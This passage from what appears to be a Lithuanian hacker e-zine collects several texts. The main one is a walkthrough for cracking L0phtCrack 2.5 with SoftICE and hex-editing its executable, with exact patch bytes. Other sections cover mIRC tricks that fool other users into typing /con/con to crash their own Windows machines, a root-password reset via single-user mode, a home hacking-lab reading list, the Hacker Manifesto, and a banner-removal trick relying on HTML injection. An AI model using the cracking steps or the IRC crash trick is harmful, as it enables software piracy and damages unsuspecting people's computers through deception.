:00406361 E8FAFE0100 call 00426260 <- unlock tikrinimas
:00406366 83C408 add esp, 00000008
:00406369 85C0 test eax, eax
:0040636B 7435 je 004063A2 <- ar mūsų unlock geras/blogas
:0040636D 6A00 push 00000000
:0040636F 6A00 push 00000000

* Possible StringData Ref from Data Obj ->”You have entered an invalid code. “
->”Please try again.” <- mūsų žinutė

:00406371 6830354800 push 00483530
:00406376 E8F0020500 call 0045666B
:0040637B 56 push esi
:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0]
:00406383 E812EE0300 call 0044519A
:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080]
:0040638F E88ED50300 call 00443922
:00406394 83F801 cmp eax, 00000001
:00406397 0F846EFFFFFF je 0040630B
.

Dabar programą L0phtCrack užkrausime per SoftICE loaderį (loader32.exe). Užkrauname loaderį. Atidarome failą l0phtcrack.exe. Paskui užkrauname programą spausdami mygtuką „LOAD” arba eidami į programos meniu „MODULE/LOAD”. Aktyvuojasi SoftICE, tada spaudžiame F8 (vieną sykį). Dabar rašome: Bpx 40635f (tai mes matėme disasembleryje). Bpx yra viena iš SoftICE komandų, o skaičius 40635f yra vykdomos programos eilutės vieta. Taigi įrašyta eilutė lieps SoftICE sustabdyti programos veikimą ties ta eilute. Suprantat link kur suku? Dabar išeiname iš SoftICE (F5). Pasileidžia L0phtCrack. Vėl einame į programos užregistravimo langą. Lauke „Unlock code:” surenkame sux.
Spaudžiame OK. Aktyvuojasi SoftICE. Matome labai panašų vaizdą kaip ir
Disasembleryje (WinDasm):
.
:0040635F 52 push edx
:00406360 50 push eax
:00406361 E8FAFE0100 call 00426260 <- unlock tikrinimas
:00406366 83C408 add esp, 00000008
:00406369 85C0 test eax, eax
:0040636B 7435 jz 004063A2 <- geras/blogas unlock
:0040636D 6A00 push 00000000
:0040636F 6A00 push 00000000
:00406371 6830354800 push 00483530
:00406376 E8F0020500 call 0045666B
:0040637B 56 push esi
:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0]
:00406383 E812EE0300 call 0044519A
:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080]
:0040638F E88ED50300 call 00443922
:00406394 83F801 cmp eax, 00000001
:00406397 0F846EFFFFFF jz 0040630B
.

Rašome: d edx (Hmm kažkas yra. Užsirašome tai savo lape)
d eax (Mūsų įvestas “sux” (be kabučių))
Komanda d parodo registro (EAX, EDX.)turinį. Sintaksė yra tokia: d registras.

Uždraudžiame visų breakpointų (Bpx) naudojimą, t.y. parašome komandą BD *.
Išeiname iš SoftICE (F5). Dabar teksto lauke „Unlock code:” parašome tai ką
buvome užsirašę. Pas mane buvo 6be3b311. Spaudžiame OK. Bingo! Pasirodo žinutė: “You have successfully registered L0phtCrack 2.5″. Tai reiškia, kad jūs sėkmingai užregistravote „L0phtCrack v2.5″. Bet ne visi turi SoftICE ir Disassembler, todėl jūs turite padaryti patchą. Tai bus programa kuri žinutės pavidalu parodo unlock kodą. Bet jūs dabar jau užregistravote programą, todėl eikite į windows „Start” meniu ir vykdykite komnadą „Run”, tada surinkite „regedit” (be kabučių). Atsiduriame programoje, kuri redaguoja windowz registrą. Einame į HKEY_CURRENT_USERSOFTWAREL0phtL0phtCrack ir ištriname „Registration” stringą. Dabar jau galima daryti patchą.

Patcho darymas:
Einame į SoftICE(Ctrl+D). Surenkame komandą: Bpx MessageBoxA. Apie „Bpx” kalbėjau anksčiau, o apie „MessageBoxA” pakalbėsiu dabar. Tai yra standartinė API funkciją. Taigi mes su komanda „Bpx MessageBoxA” sustabdysime programą tada, kai ji vykdys šitą funkciją. Funkcija „MessageBoxA” išmeta žinutę. Dabar kur “Unlock code:” įvedame bet ką ir spaudžiame OK. Aktyvuojasi SoftICE. Mes esame procedūroje „MessageBoxA”, kad išeitume iš jos mes turime spausti 8 sykius F10, kai atsiranda žinutė OK ir dar 2 sykius F10 arba vieną sykį F11 ir OK (nežinau
kas jums patinka labiau J). Mes išėjome iš procedūros. Štai ką matome:

.
:0045662E 53 Push EBX
:0045662F 57 Push EDI
:00456630 FF7508 Push DWORD PTR [EBP+08]
:00456633 FF75F4 Push DWORD PTR [EBP-0C]
:00456636 FF150014D100 Call [User32!MessageBoxA]
.

Parašome: Bpx 45662e (tai bus reikalinga vėliau).
Dabar turime ieškoti seniau surasto unlock kodo (pas mane buvo 6be3b311).
Rašome: d eax (Fuck!)
d edx (Fuck!)
d ebi (Fuck!)
d ebp (Štai jis čia!)

Radome, kad jis registre EBP, bet jis dar ne jo pradžioje, taigi rašome
d ebp+54 ir jis jau pradžioje. Jis randasi vietoje F7FBE4 (šešioliktainis
kodas). Patchas vietoj žinutes: “You have entered an invalid code. Please try
again”, parodys unlock kodą. Taigi mes turime tą žinutę perdirbti. Procedūra MessageBoxA susideda iš šių dalių:

Push 00
Push <žinutės lango pavadinimas>
Push <žinutė>
Push 00
Call MessageBoxA

Mes jau žinome, kad unlock kodas yra vietoje F7FBE4 (šešioliktainis kodas), bet mums dar reikia žinutės lango pavadinimo. Mes padarysime taip, uždarome programą L0phtCrack. Failą l0phtcrack.exe atsidarome su šešioliktainiu redaktoriumi ir ieškome pagal frazę: “You have entered an invalid code” (be kabučių). Atsirandame vietoje 83530 (šešioliktainis kodas). Šita žinutė pakeičiame žinute: “Unlock kodas yra:” (be kabučių) + 00 (tai parodo, kad žinutė užsibaigia toje vietoje). Visas šešioliktainis kodas atrodys taip: 55 6E 6C 6F 63 6B 20 6B 6F 64 61 73 20 79 72 61 3A 00. Neužmirškite išsaugoti failą! SoftICE žinutės vieta yra kitur. Kyla klausimas kur? Mes tiesiog turime prie 400000 pridėti 83530 (vieta faile) ir gausime 483530 (šešioliktainis kodas). Tai ir yra vieta SoftICE. Štai turime ir lango pavadinimą ir žinutę. Tai atrodo taip:

Push 00
Push 483530
Push F7FBE4
Push 00
Call MessageBoxA

Dar atsimenate anksčiau uždėta breakpointą Bpx 45662e? Štai čia mes ir įdėsime šitą žinutę. Vėl einame į L0pthCrack. Renkame kokį nors blogą unlocką! Aktyvuojasi SoftICE ties 45662e. Užsirašome apie aštuonis šešioliktainius kodus: 53 57 FF 75 08 FF 75 F4 Jie bus pažymėti ^^^^^^^^^^ (kad jums būtų aiškiau). Jie bus reikalingi ieškant vietos su šešioliktainiu redaktoriumi:

.
:0045662E 53 Push EBX
__________^^
:0045662F 57 Push EDI
__________^^
:00456630 FF7508 Push DWORD PTR [EBP+08]
__________^^^^^^
:00456633 FF75F4 Push DWORD PTR [EBP-0C]
__________^^^^^^
:00456636 FF150014D100 Call [User32!MessageBoxA]
.

Dabar parašome komandą a (assembler). Spaudžiame klavišą enter ir parašome šias eilutes:

Push 00
Push 483530
Push F7FBE4
Push 00
Call MessageBoxA
Nop

Baigia rašyti, spaudžiame klavišą „Escape”! Komanda nop reikalinga, kadangi sugadinome vieną komandą, nes naujai žinutei prireikė daugiau baitų. Komanda buvo nepilna, todėl mes ją panaikinonome (NOP reiškia nieką. Ji tiesiog nevykdoma). Jeigu šito būtume nepadarę būtume sugadinę programą ir ji butų neveikusi!

Pakeistas kodas su SoftICE:

:0045662E 6A00 Push 00
:00456630 6830354800 Push 483530
:00456635 68E4FBF700 Push F7FBE4
:0045663A 6A00 Push 00
:0045663C E898D2B0BF90 Call USER32!MessageBoxA
:00456641 90 Nop

Pabaiga:
Dabar jau užsirašome visus pakeistus eilučių šešioliktainius kodus: 6A 00 68 30 35 48 00 68 E4 FB F7 00 6A 00 E8 98 D2 B0 BF 90. Išeiname iš SoftICE ir L0phtCrack. Einame į šešioliktainį redaktorių. Faile ieškome pagal tuos aštuonis anksčiau užsirašytus kodus: 53 57 FF 75 08 FF 75 F4 ir nuo tos vietos pakeičiame į pakeistus kodus: 6A 00 68 30 35 48 00 68 E4 FB F7 00 6A 00 E8 98 D2 B0 BF 90. Tai ir yra mūsų patchas. Dabar paleidžiame L0phtCrack ir einame surinkti unlock. Spaudžiame OK ir matome žinutę: „Unlock kodas yra:” XXXXXXXX (X yra bet koks simbolis). Spaudžiame OK ir renkame matytą kodą. Vėl atsiranda ta pati žinutė. Paspaudžiame OK ir mes jau užsiregistravę J. Taigi dabar mes turime nupachintą l0phtcrack.exe failą, bet toks failas yra didelis ir tik pas jus, todėl mes turime padaryti programa, kuri automatiškai, tą EXE failą nupatchintų. Tam ir reikalinga pradžioje minima programa „UCOL Patch Maker”. Ar dar atsimenate, kad iš pat pradžių l0phtcrack.exe nukopijavote į saugią vietą? Taigi jūs turite ogiginalų ir nupatchintą failus, o ką toliau reikia daryti žiūrekite į programos „UCOL Patch Maker” aprašymą!

26. Linux tutorialas naujokams

1. Ka daryti jei uzmirsau r00t passworda?
2. Ismok parasyti shell scriptus

1. Ka daryti jei uzmirsau r00t passworda?

Karta kol buvau didelis Linux newbie atsitiko vienas dalykas:
uzmirsau r00t passworda.
O kitaip gauti r00t teisiu nejo/nemokejau, tad teko perinstalioti visa linux.
Kad ir jums nereiktu del to vargti papasakosiu, kaip gauti r00t teises
kompiuteryje:
Ijungus kompiuteri islenda lilo raginimas pasirinti OS.
Jus iveskite linux labeli ir po tarpo parasykite raide ‘S’.
Tada linuxsas krausis single mode rezimu, o uzsikroves duos jums shell`a
su r00t teisemis.
Tada galesite pakeisti slaptazodi su ‘passwd’ komanda.

2. Ismok parasyti shell scriptus

Kartais schell skriptai arba aplinkos scenarijai sutrumpina jusu
darbo laika. Jie gali vykdyti tam tikra komandu seka, t.y. automatizuoti
tavo darba.
Kaip rasomi sie skriptai?
Pirmoje eiluteje rasomas ‘#!’ ir pilnas shell interpretatoriaus pavadinimas
t.y. pavadinimas su keliu. Pvz. #!/bin/bash
po to rasomos komandos kurias alikines scriptas.
PVZ. Nr. 1:
#!/bin/bash
#viskas kas prasideda ‘#’ yra komentarai
#Sis skriptas demonstruoja kaip prieiti prie skripto argumentu
#Suzinoti savo uid ir username

#echo -spausdina kintamaji, eilute i STDOUT
echo “Skripto pavadinimas:” $0
echo “Pirmas argumentas :” $1
echo “Antras argumentas :” $2
user=`id -un`;
#ivykdo id -un ir isvesti perduoda kintamajam $user
uid=`id -u`;
echo “Username: ” $user
echo “uid: ” $uid
###### End Of Script Nr. 1 #########

PVZ. Nr. 2:
#!/bin/bash
#viskas kas prasideda ‘#’ yra komentarai
#Skriptas demonstruoja salygini sakini if
if [ -d /etc/httpd ] # -d tikrina ar failas yra katalogas
then
echo “tu turi instaliaves apache ar kita www serveri”
else
echo “gali buti, kad jus neturite jokio www serverio”
fi # kas sake kad programuotojai be humoro jausmo
###### End Of Script Nr. 2 #########

PVZ. Nr. 3:
#!/bin/bash
#viskas kas prasideda ‘#’ yra komentarai
#demonstruoja cikla while
while read Line; #skaito is STDOUT eilute
do echo $Line; #ja spausdina
done
#skriptas dirba panasiai kaip komanda cat
###### End Of Script Nr. 3 #########

PVZ. Nr. 4:
#!/bin/bash
#viskas kas prasideda ‘#’ yra komentarai
#demonstruoja kaip valdyti telnet ar pan.
telnet host 21 << EOF #konektinas su host kompu per 21 porta
qoute user FTP #siuncia useri
qoute pass email@email.dom #pasworda
MKDIR /same/dir #kuria dorektorija
qoute quit #atsisveikina su ftpd ir baigia darba
EOF
###### End Of Script Nr. 4 #########

27. Laikinas LINUX tinklas namie

From harlequin@fnord.org.uk Tue Jun 20 12:25:18 2000
Newsgroups: alt.2600,alt.2600.hackerz,alt.hacker,alt.hacking
Subject: HowTo: Makeshift Linux Network @ Home ..
From: Harlequin
Date: Tue, 20 Jun 2000 10:25:18 GMT

[Nuo VisiGoth:

1.Šita žinutė buvo perdyota Quinny 12.30.98 neribotam laikui.

2.Šitą žinutė paskelbė Osiris prieš kurį laiką (galbūt prieš pusantrų metų???) ir nuo to laiko jos daug kas ieškojo, bet niekas daugiau jos nepaskelbė, net pats Osiris, tad aš radau laiko paskelbti ją iš naujo kiekvienamm, kuris jaučia, kad jos reikia, nes aš manau, kad tai yra -labai- gera žinutė ir ji -turi- būti perskaityta kiaurai išilgai.]

%%%%
%%%%

1. Gauk Linux arba FreeBSD ASAP

2.Įsigyk vieną arba daugiau knygų, parašytų Spaffordo, Bellovino, Cheswicko,
Rubino arba Ranumo.

3.Gauk tiek Camelio, tiek Llamos knygas apie Perl

4.Gauk ORA knygą apie TCP/IP

5.Nusipirk keletą senų kompų (386/486) ir instaliuok tinklo plokštes. Apsiginklavęs šitais daikčiukais sukonstruok mažą UNIX tinklą savo namuose (arba garaže). Jei pasirinksi LINUX, perskaityk visus HOWTO, ypatingai tinklų HOWTO. Sukurk bent 5 vartotojų akauntus, leisdamas bent jau šelo priėjimą iš kiekvieno akaunto kiekviename kompe. Kai viskas bus sukonfigūruota (tinklas yra ir veikia), pabandyk (kaip skirtingas varotojas) įsilaužti į vieną ar kelis kompus tinkle. (Tu turėtum idealiai atakuoti įvairius servisus, ne tik kokį nors vieną.)

Taipogi: parsisiųsk SAFEsuite demo, seną ISS arba SATAN. Leisk šitas utėles prieš savo sistemą ir perskaityk tutorialus, kurie yra pridėti prie šitų utėlių dokumentacijos.

Toliau, gauk visus įrankius iš šito URL:
http://www.giga.or.at/pub/hacker/unix

Išmok kiekvieną iš jų naudoti. Toliau, gauk AUSCERT UNIX saugumo sąrašą iš:
ftp://ftp.auscert.org.au/pub/auscert/papers/unix_security_checklist

Toliau, gauk UNIX saugumo sąrašą iš:
http://stimpy.cac.washington.edu/~dittrich/R870/security-checklist.html

Toliau, gauk Site Security Handbook (RFC 1244) iš:
http://stimpy.cac.washington.edu/~dittrich/R870/rfc1244.txt

Toliau, gauk šitą dokumentą iš SRI:
http://stimpy.cac.washington.edu/~dittrich/R870/SRI-Whitepaper.ps

Po to, kai perskatysi ir suprasi visą aukščiau išdėstytą dokumentaciją (ir išbandysi kai kuriuos arba visus minimus įrankius, perskaityk šituos dokumentus:

Intrusion Detection Checklist:
ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist

Dan Farmer’s Survey on Various Hosts:
http://www.trouble.org/survey/

Improving the Security of Your Site by Breaking Into it:
http://www.trouble.org/security/admin-guide-to-cracking.html

Visą popierizmą šitam saite, bet ypač Nancy Cook ir jos partnerio darbą:
http://www.trouble.org/security/auditing_course/

Murphy’s law and computer security by Wietse Venema:
http://www.trouble.org/security/murphy.html

Po to kai absorbuosi ir šią informaciją, ieškok šitų popierių:
CIAC-2308_Securing_Internet_Information_Servers.pdf:
http://ciac.llnl.gov/ciac/documents/CIAC-
2308_Securing_Internet_Information_Servers.pdf

Securing X Windows:
http://ciac.llnl.gov/ciac/documents/CIAC-2316_Securing_X_Windows.pdf

How to Detect an Intrusion:
http://ciac.llnl.gov/ciac/documents/CIAC-
2305_UNIX_Incident_Guide_How_to_Detect_an_Intrusion.pdf

Galiausiai, eik čia ir studijuok kiekvieną skylę, minimą BUGTRAQ archyve:
http://www.geek-girl.com/bugtraq/search.html

Kiti tau labai padėsiantys dalykai:

1.Užsiprenumeruok visas žinutes apie UNIX saugumą, pvz.BUGTRAQ,
CIAC, CERT ir t.t.

2.Iš šitų sąrašų susidaryk žinomų saugumo ekspertų (pvz.Farmerio, Venemos, Spaffordo,
Ranumo ir kitų) emailų adresų duomenų bazę.

3.Šniukštinėk Internete bet kokių jų emailų apraiškų – sąrašuose, diskusijų grupėse ar tiesiog webe. (Dėmesio! Nebandyk nervinti šitų vaikinų, tiesiog perskaityk jų mintis ir idėjas, absorbuok jas ir judėk toliau).

4.Kai tu susidursi su exploitų kodu (o tu būtinai susidursi), paminėtu sąrašuose, sukompiluok ir įvykdyk jį. Užsirašyk rezultatus. (Viena gera priežastis instaliuoti LINUX ar FreeBSD: visi kompiliatoriai yra nemokami ir per pilną instaliaciją jau gerai sukonfigūruoti).

5.Pabandyk praleisti bent po valandą į dieną studijuodamas soketų programavimą.

6.Nueik į naudotų knygų knygyną ir nusipirk kiekvieną knygą apie sistemų administravimą. Bent jaunusipirk knygas, nukainuotas labai stipriai. Kuo pigesnės, tuo geriau.

7.Nežvenk, nes šitų kalbų pradmenys tikrai daug padės:
A. PERL
B. AWK/GAWK/NAWK
C. SED
D. Expect

Taipogi pagelbėtų lentelė, kurioje būtų skirtumai tarp panašias ar identiškas užduotis, atliktas sh/bash/csh. Be to, jums turėtų būti įdomu paieškoti skirtumų tarp skirtingų UNIX versijų. Verta nusipirkti senų AIX, HP-UX, Unicos, IRIX, Data General, SunOS, Solaris, XENIX, SYS V ir t.t. instrukcijų. Žemiau esantis knygų sąrašas taipogi galėtų tau padėti. (Jos surašytos abėcėlės tvarka, ne pagal patikimą. Asmeniškai, aš rinkčiausi knygas, minėtas aukščiau.)

Building Internet Firewalls
D. Brent Chapman, Elizabeth D. Zwicky (1995)ISBN: 1565921240

Commonsense Computer Security: Your Practical Guide to
InformationProtection
Martin R. Smith (1994)ISBN: 0077078055

Computer Crime: A Crimefighter’s Handbook
David J. Icove, David, Seger, Karl Icove, Karl A. Seger, Vonstorch
(1995)ISBN: 1565920864

Computer Security
John M. Carroll
(1996)ISBN: 0750696001

Computer Security Basics
Deborah Russell, G.T. Gangemi
(1991)ISBN: 0937175714

Computer Security Handbook
Arthur E. Hutt, Seymour Bosworth, Douglas B. Hoyt
(1995)ISBN: 0471118540

Firewalls and Internet Security: Repelling the Wily Hacker
William R. Cheswick, Steven M. Bellovin
(1994)ISBN: 0201633574

Fundamentals of Computer Security Technology
Edward G. Amoroso
(1994)ISBN: 0131089293

Hacker Proof: The Ultimate Guide to Network Security
Lars Klander, Edward J. Renehan
(1997)ISBN: 188413355X

Halting the Hacker: A Practical Guide to Computer Security
Donald L. Pipkin
(1997)ISBN: 013243718X

Information Warfare : Chaos on the Electronic Superhighway
Winn Schwartau (1996)ISBN: 1560251328

Internet Firewalls and Network Security
Chris Hare, Karanjit S. Siyan
(1996)ISBN: 1562056328

Internet Firewalls and Network Security
Karanjit, Ph.D. Siyan, Chris Hare
(1996)ISBN: 1562054376

Internet Security: Professional Reference
Derek Atkins, Tom Sheldon, Tim Petru, Joel Snyder
(1997)ISBN: 156205760X

Maximum Security: A Hacker’s Guide to Protecting Your Internet Site and
Network
Anonymous (1997)ISBN: 1575212684

Personal Computer SecurityEdward Tiley
(1996)ISBN: 1568848145

Practical Unix and Internet Security
Simson Garfinkel, Gene Spafford
(1996)ISBN: 1565921488

Protecting Your Web Site With Firewalls
Marcus Goncalves, Vinicius A. Goncalves
(1997)ISBN: 0136282075

Protection and Security on the Information Superhighway
Frederick B. Cohen
(1995)ISBN: 0471113891

Secrets of a Super HackerKnightmare, the Knightmare
(1994)ISBN: 1559501065

Security in ComputingCharles P. Pfleeger
(1996)ISBN: 0133374866

Web Commerce Cookbook
Gordon McComb
(1997)ISBN: 0471196630

Web Security Sourcebook
Avi Rubin, Daniel Geer, Marcus J. Ranum, Aviel D. Rubin, Dan Geer
(1997)ISBN: 047118148X

Web Security & Commerce (Nutshell Handbook)
Simson Garfinkel, Gene Spafford
(1997)ISBN: 1565922697
http://www.amazon.com/exec/obidos/ISBN=1565922697/t/0560-5831826-082656

Access Control and Personal Identification Systems
Dan M. Bowers
(1988)ISBN: 0409900834

Internet Security SecretsJohn R. Vacca.
(1996)ISBN: 1-56884-457-3

Network and Internetwork Security: Principles and Practice.
William Stallings.
(1995)ISBN: 0-02-415483-0

Network Security: How to Plan for It and Achieve It.
Richard H. Baker.
(1994)ISBN: 0-07-005141-0

UNIX Security for the Organization.
R. Bringle Bryant.
(1994)ISBN: 0-672-30571-2

UNIX Security: A Practical Tutorial.
N. Derek Arnold.
ISBN: 0-07-002560-6 (1993)

UNIX System Security: How to Protect Your Data and Prevent Intruders.
Rick Farrow.
(1991)ISBN: 0-201-57030-0

UNIX System Security Essentials.
Christoph Braun and Siemens Nixdorf.
(1995)ISBN: 0-201-42775-3

UNIX System Security.
David A. Curry.
(1992)ISBN: 0-201-56327-4

UNIX Unleashed. 1994
Susan Peppard, Pete Holsberg, James Armstrong Jr., Salim Douba, S.Lee
Henry, Ron Rose, Richard Rummel, Scott Parker, Ann Marshall, Ron
Dippold, Chris Negus, John Valley, Jeff Smith, Dave Taylor, Sydney
Weinstein and David Till
ISBN: 0-672-30402-3.

Galiausiai tau prireiks gerų įrankių eksperimentavimui. Juos rasi čia:
http://ciac.llnl.gov/ciac/SecurityTools.html

Pradžiai tau to turėtų užtekti. Tau nebūtina viską išmokti per vieną kartą.Be abejo, firma, siūlanti tau darbą, nesitiki neįmanomo. Visgi UNIX saugumas yra besivystanti ir sudėtinga sritis. Tu neįvaldysi jos per vieną kartą. Idėja tokia: išsiaisškink senas problemas, kad kai išlįs naujos, tu žinosi jų pagrindus ir kilmę.

Pagrindinė priežastis, dėl kurios vertėtų kurti tinklą savo garaže, yra ta, kad tu turėsi šansą viską suknisti be didesnių pasekmių. Be to, tu simuliuosi mikrotinklą, galėsi žiūrėti logus ir atsakymus tiek iš atakuotojo, tiek iš aukos pusės. Tai yra labai vertinga, nes tai padės tau pasiruošti staigiai atpažinti problemą vien tik peržiūrėjus logus. Svarbiausios sritys, kuriose tau reikėtų pasikaustyti:
1. NFS
2. R servisai
3. Slaptažodžiai – aktyvūs slaptažodžių tikrintojai, bendros žinios apie DES, krekinima ir t.t.
4. Spūfinimas (spoofing)
5. Maršrutizavimas (routing)
6. Ugnies sienos (firewallai)
7. CGI (jeigu web serveriai yra integruota to tinklo architektūros dalis).

Rekomenduotina gauti TIS Firewall Toolkitą kai tik būsi pasirengęs. (Nors aš manau, kad firma, kuri tave samdys, labiau domėsis vietiniu saugumu negu nuotolinėmis problemomis. Šiaip ar taip, tai padaryti verta).

Išvertė Winter Wolf (c) Y2K

28. HACKERIO MANIFESTAS

Shiandien jie sueme dar viena. Tai – visuose laikrashciuose.
“Kompiuterinis nusikaltimas, Areshtuotas tineidzheris”, “Suimtas
hackeris isibroves i banka” .Prakeikti vaikiai. Visi jie vienodi.
Bet ar jus, su savo trydalia psichologija ir 1950tuju technosmegenim,
bandete kada nors pazhvelgti hackeriui uzh akiu? Ar norejote zhinoti,
kodel jis yra toks koks yra, kokios jegos ji suformavo?
Ash hackeris, ieikit i mano pasauli. Shis pasaulis prasideda
mokykloj. Ash gudresnis nei kiti, o tai, ko mus moko man jau
ikyrejo. Prakeitas nenaudelis. Visi jie vienodi. Ash vyresniese
klasese, klausydamas kai mokytojas penkiolikta karta aishkina apie
trupmenos prastinima. Ash suprantu tai. “Ne, ponas Smitai, ash
nerodysiu savo darbo, ash padariau tai mintinai.” Prakeiktas
vaikis. Tikriausia nusirashe. Visi jie vienodi.
Shiandien ash padariau atradima. Ash atradau kompiuteri. Pala, pala.
tai yra geras! Jis daro tai, ko ash ish jo noriu. Jeigu jis suklysta,
tai tik del to, kad ash kazhka sumaishiau. Ne del to, kad jis manes
nemegsta. ar bijo manes. ar mano kad ash gudri subine.
Ar nemegsta mokyti ir neturetu buti cia.
Prakeiktas vaikis. Viska, ka jis daro – tik zhaidimus zhaidzhia.
Visi jie vienodi.
Ir shtai tai atsitinka. Durys i pasauli atsiveria. Elektroninis
impulsas skuba telefono linijom, kaip heroinas narkomano venomis.
Ash pagaliau radau prieglauda nuo kasdieninio neishmanelishkumo,
ash atradau BBS’a. “Shtai ir yra tai. tai kur ash priklausau..”
Ash pazhistu cia kiekviena. netgi jei ash niekad nebuvau ju
sutikes. niekad su jais nekalbejau ir galbut niekad daugiau apie
juos neishgirsiu. Ash pazhistu jus visus..
Prakeiktas vaikis. Vel uzhima telefono linija. Visi jie vienodi.
Taip, subingalvi, visi mes vienodi. Mokykloje mus ish shaukshtelio
maitino vaikishku pienu, kai buvome ishalke gero bifshtekso.
tie mesos kasneliai, kuriuos jus leidote mums praryti buvo sukramtyti
ir beskoniai. Mes buvom priklausomi nuo sadistu ir ignoruojami
abejinguju. Tie, kurie ishtikruju turejo ko mokyti, laike mus daug
zhadanciais mokiniais, bet tie keli buvo kaip vandens lashas
dykumoje.
Dabar tai musu pasaulis. elektronu ir komutatoriu, baud’o grozhio
pasaulis.
Mes nemokame uzh paslaugas, kurios butu pigios, jei nebutu
kontroliujamos spekuliuojancziu apsirijeliu, ir jus vadinate mus
nusikalteliais. Mes tyrinejam. ir jus vadinate mus nusikalteliais.
Mes egzistuojame be odos spalvos, be tautybes, be religiniu
nusistatymu. ir jus vadinate mus nusikalteliais.
Jus konstruojate atomines bombas, jus kurstote karus, jus zhudote,
sukciaujate ir meluojate mums, bandydami mus itikint, kad tai musu
paciu labui, o mes vis dar nusikalteliai.
Taip, ash nusikaltelis. Mano nusikaltimas yra smalsumas. Mano
nusikaltimas yra tai, kad ash vertinu zhmones pagal tai, ka jie sako
ir galvoja, o ne pagal tai, kaip jie atrodo.
Mano nusikaltimas yra tai, kad ash protingesnis uzh jus, tai, ko jus
man niekad neatleisite.

Ash hackeris, ir tai mano manifestas. Jus galit sustabdyti viena,
bet jus negalit sustabdyti musu visu. Juk kaip ten bebutu, visi mes
vienodi.

+++The Mentor+++

——————————————————
Verte Meshkutiz Grizlius & M.Mazhvydas, ish
‘HACKERS MANIFESTO’ by The Mentor
——————————————————

29. mIRC bug’s

Shtai keli budai kaip apgauti lamerius padariusiu takeover! kokiame nors jusu kanale:
1.Galite apsimesti reklamos agentu sakydami : “Sveikas jei nori waru takeoveriu ir viso kito ateik i kanala #6,0”, kai jis parashys /j 6,0 ar /j #6,0 ir paliks visus kanalus iskaitant ir tavo! Zhodzi ureikia lameri priversti parashyti /j 6,0 tada jis paliks kanala! Zhodziu netures opo!
2.Gali pasakyti dar ka : “Sveiki ash esu botas eggdropas del papildomu komandu rashykite /con/con”, jei jis parashys tai jis jau skaitykite atgavote kanala, lameriukas dabar perkrauti kompa turi! (Taip jam ir reikia)

3. Dar vienas geras budas pamokyti lamerius(takeoverintojus) – jei sako kad nori opo, jam sakyk rashyk /server op #hakeriai ir jam geraj nesibaigs, nes jis jau ***Lamer has quit IRC!!!!
Realiai shi komanda pakeichia serverius pvz jei jis parashytu /server irc.is.lt jis tik jungtusi prie jo. O musu kietajam hakeriu vien zhodis /server ka reishia!!!! =]

Nu bet atsiminkite kad shie budai veikia tik totaliems neishmaneliams!

NU tiek Craft[Eye] – CraftEye@gmx.net

30. mIRC invisibility

2000.10.26 (c) J-azz
*Life iz sux*
*Telekomaz Must die*
*J-azz iz Alive*
He110, everybody. na ka kadangi zhiuriu kazhkajp visi aptilo su txt’u rashymu,
taj sakau gal man rejkia pagelbet.
Ajshq shis textaz yra skirtaz TIK 🙂 mokymo tixlamz ir ash jokioz atsakomybez
neprisiimu. Ir uzh skajtytojo vejxmuz neatsakau.
Texte vartojami ishsirejshkimaj neatitinka lietuviu kalboz normu.
Taj ka vazhiuojam? oky-doky..

31. mIRC’o slaptybez

(Pagal “Efektivnij Hacking” by Aleksej Petrovskij, Boris Leontjev)
*Ivadaz*
Taj ka bichiuli atsibodo paprastaj bazarint ir kabint panaz, kurioz
tik slepdamosi uz monitoriauz atrodo kjetoz? 0 susitikuz neishtrauki nej
zh0dzhi0. hmmmm.. That’z n0 c00l? I kn0w, I kn0w. Na ka pradedam su rimtesniaiz
dalykajz. na chia shitam txt’e, nebus njeko tokio kazhko ypatingo,
bet. svarbu info.. ania? Lekjam toliau, atsidaryk alauz ir skaityk..
*Tapk nematomaz*
Na chia tox dalykaz kaip nematomumaz. Ivykdome komanda:
/mode $me +i
Paprasta? Ir kas tau ish to? Na gi nieko ypatingo, tu tapaj nematomas visjemz qrie
nezhino tavo tixlaus nick’o.. ir be to negales taves rast pagal Userid(dalis tavo
y-mail’a iki simbolio @), bej bandydami su komandom /who arba /names
Naujausiose IRC versijose taj jau gali ijungti ir lange Setup uzhdedamaz varnele ant
Invisible Mode Ajshq, jei uzhejsi i kanala tu tapsi matomu(matysis nick’az).
*Komanda /who*
Pakankamaj galinga pajeshkoz komanda yra /who, pagal kokia nors jau zhinoma informacija.
Ir kazhkodel taj apie taj nej zhodzhiu neuzhsiminta mIRC’o Help’e(Pac netikrinau ar
tikraj nera, pasitikiu shaltiniu). Naudodami komanda
/whois Lamer
Mes dazhniausiai gaunam kazhka panashaus i taj:
Lamer ~qrutaz@takas.mustdie.lt * cool
Lamer on #lamerland #qrutaj
Lamer using irc.omnitel.net[193...]
Omniteliz
End of /WHOIS
Komanda /who lejdzhia daryti pajeshka pagal mums jau zhinoma dali, pvz. Real Name, Userid. etc.
pvz:
mes jeshkom kahzko ish Marijoz zhemez:
/who *.lt*
arba tu jau bendravaj su Lamer’iu ir nori ji rasti vel:
/who *qrutaz*
arba
/who *cool*
Tajp gali rasti ir tave jei nesinaudosi nematomumu.
*ThE EnD*
Taj tjek apje IRC 2night. CUL
P.$.
Jei bus dar alauz ir merdzhinu, taj bus dar ir textu.. 😉
[Njeko nekejsdami galite lajsvaj platinti]
P.$.$.
4 more info check me out on Internet
y-mejl: J-azz@centras.lt

32. NAMEZERO

Namezero.com Uzhejes i tikrai shaunu saita UID0 pamachiau straipsni apie Namezero baneriu panaikinima. Tikrai idomus faktas apie tai, kad namezero baneriai yra sudaryti ish papraschiausiu frame’u. SaTaN sugalvojo buda, kuris nukilina namezero frame’a. Atrodytu butu viskas labai shaunu, bet su nukilintu frame’u dingsta ir jusu domenas narshykles adress bare (ten lieka jusu tikrojo puslapio adresas.). nemanau, kad tai tenkina mus, todel yra ir kitas budas. ish pradzhiu pasidarome www.namezero.com accounta. Savo accounto viduje rasi skiltele “Home Page”. Ten yra nustatomas tikrasis jusu domeno adresas “Actual URL”, Keyworday “Keywords” ir Aprashymas “Description”.i actual URL bei KeyWords rashykit ka tik norit. Mus reikia butent descriptnion, kurio textas naudojamas banerio fraime. Shtai ka jums teks ten irashyti: “>

33. Linux Naujokams

Trumpas Linux totorial`as naujokams

Turinys:
1. Kas yra Linux?
